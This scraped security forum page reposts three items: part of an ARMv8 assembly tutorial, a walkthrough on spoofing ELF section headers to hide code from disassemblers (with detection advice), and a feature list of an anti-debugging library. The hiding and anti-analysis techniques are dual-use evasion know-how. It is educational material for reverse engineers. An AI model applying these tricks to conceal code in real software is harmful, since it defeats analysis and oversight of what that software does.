[TD]LT[/TD] [TD]N and V differ[/TD] [TD]Signed <[/TD] [/TR] [TR] [TD]GT[/TD] [TD]Z clear, N and V the same[/TD] [TD]Signed >[/TD] [/TR] [TR] [TD]LE[/TD] [TD]Z set, N and V differ[/TD] [TD]Signed <=[/TD] [/TR] [TR] [TD]AL[/TD] [TD]Any[/TD] [TD]Always. This suffix is normally omitted.[/TD] [/TR] [/TABLE] when you see <cond> near an assembly instruction you can use one of these suffixes. [h=2]Istruction Set[/h] The A64 encoding structure breaks down into the following functional groups: A miscellaneous group of branch instructions, exception generating instructions, and system instructions. Data processing instructions associated with general-purpose registers. These instructions are supported by two functional groups, depending on whether the operands: Are all held in registers. Include an operand with a constant immediate value. [*]Load and store instructions associated with the general-purpose register file and the SIMD and floating-point register file. [*]SIMD and scalar floating-point data processing instructions that operate on the SIMD and floating-point registers. (I don’t debate) [h=3]What instructions are not present compared to AArch32:[/h] Conditional execution operations, cause of: The A64 instruction set does not include the concept of predicated or conditional execution. Benchmarking shows that modern branch predictors work well enough that predicated execution of instructions does not offer sufficient benefit to justify its significant use of opcode space, and its implementation cost in advanced implementations. [source] Load Multiple. instructions load from memory a subset, or possibly all, of the general-purpose registers and the PC, so there aren’t: push, pop, ldmia, ecc… : these are be replace by load/store pair. Coprocessor instructions [h=3]Branches & Exception[/h] Conditional branch Conditional branches change the flow of execution depending on the current state of the condition flags or the value in a general-purpose register. [TABLE] [TR] [TD]B<cond>[/TD] [TD]Branch conditionally[/TD] [TD]B.<cond> <label>[/TD] [/TR] [TR] [TD]CBNZ[/TD] [TD]Compare and branch if nonzero[/TD] [TD]CBNZ <Wt|Xt>, <label>[/TD] [/TR] [TR] [TD]CBZ[/TD] [TD]Compare and branch if zero[/TD] [TD]CBZ <Xt>, <label>[/TD] [/TR] [/TABLE] Unconditional branch [TABLE] [TR] [TD]B[/TD] [TD]Branch unconditionally[/TD] [TD]B <label>[/TD] [/TR] [TR] [TD]BL[/TD] [TD]Branch with link[/TD] [TD]BL <label>[/TD] [/TR] [/TABLE] The BL instruction(s) writes the address of the sequentially following instruction, for the return (see RET), to general-purpose register, X30. Unconditional branch (register) [TABLE] [TR] [TD]BLR[/TD] [TD]Branch with link to register[/TD] [TD]BLR <Xn>[/TD] [/TR] [TR] [TD]BR[/TD] [TD]Branch to register[/TD] [TD]BR <Xn>[/TD] [/TR] [TR] [TD]RET[/TD] [TD]Return from subroutine:[/TD] [TD]RET {<Xn>}; where Xn register holding the address to be branched to. Defaults to X30 if absent.[/TD] [/TR] [/TABLE] Exception generating HVC Generate exception targeting Exception level 2 SMC Generate exception targeting Exception level 3 SVC Instruction Generate exception targeting Exception level 1 Others instrunctions NOP: No OPeration WFE Wait for event WFI Wait for interrupt SEV Send event SEVL Send event local [h=3]Load/Store register[/h] There’re many instructions in this class to move many data size: byte, halfword and word, but I show only four, just to make you understand them : two for move single register and two for move a pair of registers; but first I have to describe how we can access to memory. [h=4]Load/Store addressing modes[/h] This part is very important to understand different ARM addressing modes; the most used are three: [base{, #imm}]: Base plus offset addressing means that the address is the value in the 64-bit base register plus an offset. Example: ldrsw x0, [x29,76] #load signed word in x0 [*][base, #imm]! : Pre-indexed addressing means that the address is the sum of the value in the 64-bit base register and an offset, and the address is then writtenback to the base register. Example: stp x29, x30, [sp, -80]! #store x9 e x30 into stack from sp-80 [*][base], #imm : Post-indexed addressing means that the address is the value in the 64-bit base register, and the sum of the address and the offset is then written back to the base register. Example: ldp x29, x30, [sp], 80 #load values from stack now I can describe load/store instructions, don’t care addressing mode, I show you only few example. Single Register Save a register into a memory ldr: Load register works with: Register offset: LDR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}] Immediate offset: LDR <Xt>, [<Xn|SP>], #<simm> PC-relative literal: LDR <Xt>, <label [*]str: Store register: register offset: STR <Xt>, [<Xn|SP>, <R><m>{, <extend> {<amount>}}] immediate offset: STR <Xt>, [<Xn|SP>], #<simm> <simm> is signed immediate byte offset, in the range -256 to 255 Pair of Registers Save the two registers specified into memory address of Xn or SP ldp load pair: LDP <Xt1>, <Xt2>, [<Xn|SP>], #<imm> stp store pair: STP <Xt1>, <Xt2>, [<Xn|SP>], #<imm> <imm> is signed immediate byte offset, a multiple of 8 in the range -512 to 504 [h=3]Data processing – immediate[/h] Arithmetic (immediate) [TABLE] [TR] [TD]ADD[/TD] [TD]ADD (immediate)[/TD] [TD]ADD <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn + shift(imm)[/TD] [/TR] [TR] [TD]ADDS[/TD] [TD]Add and set flags[/TD] [TD][/TD] [/TR] [TR] [TD]SUB[/TD] [TD]Subtract[/TD] [TD] SUB <Xd|SP>, <Xn|SP>, #<imm>{, <shift>}; Rd = Rn – shift(imm)[/TD] [/TR] [TR] [TD]SUBS[/TD] [TD]Subtract and set flags[/TD] [TD][/TD] [/TR] [TR] [TD]CMP[/TD] [TD]Compare[/TD] [TD] CMP <Xn|SP>, #<imm>{, <shift>}[/TD] [/TR] [TR] [TD]CMN[/TD] [TD]Compare negative[/TD] [TD][/TD] [/TR] [/TABLE] Where: <shift> Is the optional shift type to be applied to the second source operand, defaulting to LSL. The shift operators LSL (logical shift left), ASR (arithm sift right) and LSR (logical shift right) accept an immediate shift <amount> in the range 0 to one less than the register width of the instruction, inclusive. Logical [TABLE] [TR] [TD]AND[/TD] [TD]Bitwise[/TD] [TD]AND <Xd|SP>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR] [TR] [TD]ANDS[/TD] [TD]Bitwise AND and set flags[/TD] [TD]ANDS <Xd>, <Xn>, #<imm> ;Rd = Rn AND imm[/TD] [/TR] [TR] [TD]EOR[/TD] [TD]Bitwise exclusive[/TD] [TD]EOR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn EOR imm[/TD] [/TR] [TR] [TD]ORR[/TD] [TD]Bitwise inclusive[/TD] [TD]ORR <Xd|SP>, <Xn>, #<imm> ;Rd = Rn OR imm[/TD] [/TR] [TR] [TD]TST[/TD] [TD]Test bits[/TD] [TD]TST <Xn>, #<imm> ;Rn AND imm[/TD] [/TR] [/TABLE] Move Instructions to move wide immediate (16bit): [TABLE] [TR] [TD]MOVZ[/TD] [TD]Move wide with zero[/TD] [TD] MOVZ <Xd>, #<imm>{, LSL #<shift>} ;Rd = LSL (imm16, shift)[/TD] [/TR] [TR] [TD]MOVN[/TD] [TD]Move wide with NOT[/TD] [TD] MOVN <Xd>, #<imm>{, LSL #<shift>} ;Rd = NOT (LSL (imm16, shift))[/TD] [/TR] [TR] [TD]MOVK[/TD] [TD]Move 16-bit immediate into register, keeping other bits unchange[/TD] [TD] MOVK <Xd>, #<imm>{, LSL #<shift>} ; Rd<shift+15:shift> = imm16[/TD] [/TR] [/TABLE] There are also an instruction to move immediate: MOV <Xd>, #<imm> ;Rd = imm but his three versions are aliases of movz, movn and movk PC-relative address calculation The ADR instruction adds a signed, 21-bit immediate to the value of the program counter that fetched this instruction, and then writes the result to a general-purpose register: ADR <Xd>, <label> The ADRP instruction permits the calculation of the address at a 4KB aligned memory region. In conjunction with an ADD(immediate) instruction, or a Load/Store instruction with a 12-bit immediate offset, this allows for the calculation of, or access to, any address within ±4GB of the current PC: ADRP <Xd>, <label> Shift [TABLE] [TR] [TD]ASR[/TD] [TD]Arithmetic shift right[/TD] [TD] ASR <Xd>, <Xn>, #<bits to shift>[/TD] [/TR] [TR] [TD]LSL[/TD] [TD]Logical shift left[/TD] [TD] LSL <Xd>, <Xn>, #<shift>[/TD] [/TR] [TR] [TD]LSR[/TD] [TD]Logical shift right[/TD] [TD] LSR <Xd>, <Xn>, #<shift>[/TD] [/TR] [TR] [TD]ROR[/TD] [TD]Rotate right[/TD] [TD] ROR <Xd>, <Xs>, #<bits to shift>[/TD] [/TR] [/TABLE] [h=3]Data processing – register[/h] Arithmetic (shifted register) ADD: Add ADDS: Add and set setting the condition flags SUB: Subtract SUBS: Subtract and set flags CMN: Compare negative CMP: Compare NEG: Negate ; Rd = 0 – shift(Rm, amount) NEGS: Negate and set flags How ADD works, the others are similar: ADD <Xd>, <Xn>, <Xm>{, <shift> #<amount>} Rd = Rn + shift(Rm, amount); There’re also the Arithmetic with carry instructions which accept two source registers, with the carry flag as an additional input to the calculation and don’t support shift. ADC: Add with carry ADC <Xd>, <Xn>, <Xm> ADCS: Add with carry and set flags ADCS <Xd>, <Xn>, <Xm> ;Rd = Rn + Rm + C SBC: Subtract with carry SBC <Xd>, <Xn>, <Xm> ;Rd = Rn – Rm – 1 + C SBCS: Subtract with carry and set flags NGC: Negate with carry NGC <Xd>, <Xm> ;Rd = 0 – Rm – 1 + C NGCS: Negate with carry and set flags Logical (shifted register) AND: Bitwise AND ANDS: Bitwise AND and set flags BIC: Bitwise bit clear Rd = Rn AND NOT shift(Rm, amount) BICS: Bitwise bit clear and set flags EON: Bitwise exclusive OR NOT Rd = Rn EOR NOT shift(Rm, amount) EOR: Bitwise exclusive OR Rd = Rn EOR shift(Rm, amount) ORR: Bitwise inclusive OR MVN: Bitwise NOT Rd = NOT shift(Rm, amount) ORN: Bitwise inclusive OR NOT Rd = Rn OR NOT shift(Rm, amount) TST: Test bits Rn AND shift(Rm, amount) How they work: AND <Xd>, <Xn>, <Xm>{, <shift> #<amount>} Rd = Rn AND shift(Rm, amount) Here <shift> has the default shift operators more the ROR (rotate right) Multiply and divide MADD Multiply-add MADD <Xd>, <Xn>, <Xm>, <Xa>; Rd = Ra + Rn * Rm MSUB Multiply-subtract MNEG Multiply-negate MUL Multiply MUL <Xd>, <Xn>, <Xm>; Rd = Rn * Rm SMADDL Signed multiply-add long SMSUBL Signed multiply-subtract long SMNEGL Signed multiply-negate long SMULL Signed multiply long SMULH Signed multiply high UMADDL Unsigned multiply-add long UMSUBL Unsigned multiply-subtract long UMNEGL Unsigned multiply-negate long UMULL Unsigned multiply long UMULH Unsigned multiply high SDIV Signed divide SDIV <Xd>, <Xn>, <Xm>; Rd = Rn / Rm UDIV Unsigned divide Move The Move (register) instructions are aliases for other data processing instructions. They copy a value from a general-purpose register to another general-purpose register or the current stack pointer, or from the current stack pointer to a general-purpose register. MOV <Xd>, <Xm> Xd = Xm; Shift (register) ASRV: Arithmetic shift right variable LSLV: Logical shift left variable LSRV: Logical shift right variable RORV: Rotate right variable An example: ASRV <Xd>, <Xn>, <Xm> Rd = ASR(Rn, Rm) There’re alias instructions that haven’t the ending V. CRC32 The optional CRC32 instructions operate on the general-purpose register file to update a 32-bit CRC value from an input value comprising 1, 2, 4, or 8 bytes. There are two different classes of CRC instructions, CRC32 and CRC32C, that support two commonly used 32-bit polynomials, known as CRC-32 and CRC-32C. Conditional select The Conditional select instructions select between the first or second source register, depending on the current state of the condition flag [TABLE] [TR] [TD]CSEL[/TD] [TD]Conditional select[/TD] [TD]CSEL <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else Rm[/TD] [/TR] [TR] [TD]CSINC[/TD] [TD]Conditional select increment[/TD] [TD]CSINC <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else (Rm + 1)[/TD] [/TR] [TR] [TD]CSINV[/TD] [TD]Conditional select inversion[/TD] [TD]CSINV <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else NOT (Rm)[/TD] [/TR] [TR] [TD]CSNEG[/TD] [TD]Conditional select negation[/TD] [TD] CSNEG <Xd>, <Xn>, <Xm>, <cond> ;Rd = if cond then Rn else -Rm[/TD] [/TR] [TR] [TD]CSET[/TD] [TD]Conditional set[/TD] [TD]CSET <Xd>, <cond> ;Rd = if cond then 1 else 0[/TD] [/TR] [TR] [TD]CSETM[/TD] [TD]Conditional set mask[/TD] [TD] CSETM <Xd>, <cond> ;Rd = if cond then -1 else 0[/TD] [/TR] [TR] [TD]CINC[/TD] [TD]Conditional increment[/TD] [TD] CINC <Xd>, <Xn>, <cond> ;Rd = if cond then Rn+1 else Rn[/TD] [/TR] [TR] [TD]CINV[/TD] [TD]Conditional invert[/TD] [TD] CINV <Xd>, <Xn>, <cond> ;Rd = if cond then NOT(Rn) else Rn[/TD] [/TR] [TR] [TD]CNEG[/TD] [TD]Conditional negate[/TD] [TD] CNEG <Xd>, <Xn>, <cond> ;Rd = if cond then -Rn else Rn[/TD] [/TR] [/TABLE] Conditional comparison The Conditional comparison instructions provide a conditional select for the NZCV condition flags, setting the flags to the result of an arithmetic comparison of its two source register values if the named input condition is true, or to an immediate value if the input condition is false. There are register and immediate forms. The immediate form compares the source register to a small 5-bit unsigned value. [TABLE] [TR] [TD]CCMN[/TD] [TD]Conditional compare negative (register)[/TD] [TD]CCMN <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, -Rm) else #nzcv[/TD] [/TR] [TR] [TD]CCMN[/TD] [TD]Conditional compare negative (immediate)[/TD] [TD]CCMN <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #-imm) else #nzcv[/TD] [/TR] [TR] [TD]CCMP[/TD] [TD]Conditional compare (register)[/TD] [TD]CCMP <Xn>, <Xm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, Rm) else #nzcv[/TD] [/TR] [TR] [TD]CCMP[/TD] [TD]Conditional compare (immediate)[/TD] [TD]CCMP <Xn>, #<imm>, #<nzcv>, <cond> ;flags = if cond then compare(Rn, #imm) else #nzcv[/TD] [/TR] [/TABLE] Where: <nzcv> is the flag bit specifier, an immediate in the range 0 to 15, giving the alternative state for the 4-bit NZCV condition flags, encoded in the nzcv field. <imm> Is a five bit unsigned (positive) immediate encoded in the imm5 field. How ccmop works: it checks NZCV flags for <cond>, if previous comparison passed, do this one and set NZCV, otherwise set NZCV to <imm>. If we have to write this code: x0 >= x1 && x2 == x3 in arm assembly, with ccmp we can do this: cmp x0, x1 ccmp x2, x3, #0, ge beq good [h=2]Assembly Example:[/h] It’s time to code!! Like others tutorial on assembly I show first the C-like code and then ARM asm. #include "stdio.h" static int v[] = {1,2,3,4,5,6,7,8,9,10}; void print(int i); int add(int v, int t); int main() { int i; int array[10]; for(i=0; i < 10; i++) array = v * (add(i,5)); return 0; } int add(int v, int t) { return v + t; } Now this is the asm code generated by GCC, you need to download Linaro GCC to code on ARMv8: .cpu generic+fp+simd .data .align 3 .type v, %object .size v, 40 ;v array v: .word 1 .word 2 .word 3 .word 4 .word 5 .word 6 .word 7 .word 8 .word 9 .word 10 ;dump: 0000000000410918 : 410918: 00000001 .word 0x00000001 41091c: 00000002 .word 0x00000002 410920: 00000003 .word 0x00000003 410924: 00000004 .word 0x00000004 410928: 00000005 .word 0x00000005 41092c: 00000006 .word 0x00000006 410930: 00000007 .word 0x00000007 410934: 00000008 .word 0x00000008 410938: 00000009 .word 0x00000009 41093c: 0000000a .word 0x0000000a ; end dump .text .align 2 .global main .type main, %function main: stp x29, x30, [sp, -80]! ;save register into sp-80 and sp-88, and free memory for array ;remember the Pre-indexed addressing add x29, sp, 0 ; frame pointer = stack pointer str x19, [sp,16] ;store r19 - remember Base plus offset ;first loop str wzr, [x29,76] ;i=0 -> wzr: zero register b .L2 ;branch to label .L3: adrp x0, v ;calc label address --> dump: adrp x0, 410000 add x1, x0, :lo12:v ; --> dump: add x1, x0, #0x918 see above 0x410918 dump ldrsw x0, [x29,76] ;load signed word (i variable) lsl x0, x0, 2 ;logical shift left (as mult for 2^2), it need to calc i-offset add x0, x1, x0 ldr w19, [x0] ; w19 = v[i] ldr w0, [x29,76] ;remember [x29,76] is i ;remeber w0 is paramer register mov w1, 5 ;w1 is a param register bl add ;call add(w0, w1) mul w1, w19, w0 ;w0 after a bl has result value ;w1 = v[i] * add(w0,w1) add x2, x29, 32 ;array base address: FP+32 ldrsw x0, [x29,76] ;load i variable lsl x0, x0, 2 ;calc the add x0, x2, x0 ;array[i] offset as for v[i] str w1, [x0] ;save w1 into x0 address ldr w0, [x29,76] add w0, w0, 1 ; i += 1 str w0, [x29,76] .L2: ldr w0, [x29,76] cmp w0, 9 ble .L3 ; if i <= 9 re-start loop ;end of first for cicle mov w0, 0 ;w0 is the result register in this case ldr x19, [sp,16] ;re-load old x19 value ldp x29, x30, [sp], 80 ;re-load old frame pointer and return address .size main, .-main .section .rodata .align 2 .global add .type add, %function add: ;start of generic prologue sub sp, sp, #16 ;free memory for 2 register str w0, [sp,12] ; save the first param str w1, [sp,8] ;save the second param ;end of prologue ;code ldr w1, [sp,12] ;load the first param ldr w0, [sp,8] ;load second param add w0, w1, w0 ;w0 has the result value ;epilogue add sp, sp, 16 ;free the stack ret ;return to address in x30 .size add, .-add To run this code, you can use ARM Foundation Model (it’s free) how you see here: the Hello World in ARMv8 Sursa: Introduction to ARMv8 64-bit Architecture
  24. [h=1]Hiding code in ELF binary[/h] Written by aaSSfxxx - 11 december 2013 Since I'm contributing to the radare2, I'm learning on how a disassembler works, and especially how ELF files are handled by disassemblers. I saw that almost (even every ?) disassemblers rely on ELF section headers (generally located at the end of the file), which has never used in reality (by Linux kernel or glibc) because ELF's mapping in memory is given by program header (another ELF structure, which I described in my article about ELF packer So, we can easily hide code from disassemblers by manipulating virtual address fields of the ".text" section structure. I'll use an hexadecimal editor and the latest git revision of radare2 (which fixes a bug related to virtual address calculation in ELF binary), so I recommand you to have those tools installed of your computer to continue the reading of this article. [h=2]The trick[/h] First, let's start with the following code: int main() { printf("You will never see me !\n"); return 0; } int foo() { return 1; } The goal of this article is to make disassemblers believe that the entrypoint of the binary is the "foo" function (and not the _start function added by gcc). First, let's compile the source code to work on the generated executable. Then we need to grab the offset of the "foo" symbol, by doing Code C : rabin2 -s | grep foo and note the offset of the symbol somewhere. Then we'll strip all symbols of the binary (to avoid corrupted disassembly in IDA) using the "strip" command on our binary. Then we need to retrieve the section offset in the binary which is located at offset 0x20 of the file (for 32-bit executables, I don't have 64bit system yet so please tell me if it still works). Then we use radare2 (and the tool rabin2) to have the index in the array of sections of section .text we'll spoof. So we execute Code BASH : rabin2 -S a.out | grep .text and note the "idx" field somewhere. To find the section we just need to calculate Code PSEUDO : section_offset + (idx+1)*0x28 0x28 is the size of a section header entry, and we need to add 1 to the idx we got from radare2 because it seems to ignore the null section at the beginning. Then go to the offset calculated above, and then modify the "sh_offset" of the Elf_Shdr structure (at offset 0x10 relative to the beginning of the structure). Don't forget that we work in little endian (x86) when you edit the binary in your hex editor ! Then save the program, execute it (it should show "You will never see me !") and when you'll try to disassemble it, you will see the disassembly of the foo function as the entry point ! [h=2]What happened and how to detect it ?[/h] As I said in the introduction, kernel relies on the program header table (which generally follows the ELF header) and map PT_LOAD program headers into memory (see my articles on ELF packer I wrote). So, section headers are totally optional in ELF binaries, and are just metadata, since everything dynamic linkers need to know are stored in program headers of type PT_DYNAMIC. So we can easily spoof almost any section header without impact on a program's execution, but disassemblers (even IDA will be fooled and will produce incoherent disassembly, because disassemblers rely on section headers, which are not reliable. Anyway there are some ways to detect it. In almost binaries generated by compilers, virtual address usually have the same last digits of the offset. For exemple, 0x08048130 will match offset 0x130 in the file, or 0x0804956 can match offset 0x156. But with this manipulation we can see that offsets doesn't match at all virtual addresses, which can indicate that a binary was modified. Another way to detect it is to erase section header offset and size in the program header, which will force disassemblers (IDA and radare2 for instance) to rely on program headers for disassembly, or trying to fix section header manually. Sursa: Hiding code in ELF binary - aaSSfxxx's blog
  25. Update (03-12-2014): This tool is no longer endorsed by MorXploit as the author is no longer part of the team. Description: MorXAntiRE is a library that collect anti(debugger/disassembly/dump/VM/sandbox) tricks. MorXAntiRE is licensed under GNU/GPL version 3 and developed in C using Visual Studio 2012 and Inline Assembly. Anti-Debugging: IsDebuggerPresentAPI IsDebuggerPresentPEB CheckRemoteDebuggerPresentAPI NtQueryInformationProcess (ProcessDbgPort) NtQueryInformationProcess (ProcessDebugFlags) NtQueryInformationProcess (ProcessDebugObject) NtGlobalFlag NtSetInformationThread (HideThreadFromDebugger) Open Process Parent Process Self-Debug (CreateProcess) UnhandledExceptionFilter NtQueryObject Debugger-Attacks : BlockInputAPI OutputDebugString Timing Attacks: RDTSC Win32Timing (GetTickCount) Anti-Breakpoint: 0xCC BP detection: Memory Breakpoint Debugger Check(Guard Pages) Hardware Breakpoint Check (Debug registers with Get/SetThreadContext) Hardware Breakpoint Check (ebug registers with Structured Exception Handling) Author: Ayoub Faouzi <noteworthy_at_morxploit_dot_com> Version: MorXAntiRE v1.5 MD5: 372271696bf4a5aab6b5a4a3cf7ae794 Requirements: Windows 32bits Download: Link 1 Sursa: MorXAntiRE Anti reverse code engineering and dynamic analysis tool | MorXploit Research
×
×
  • Create New...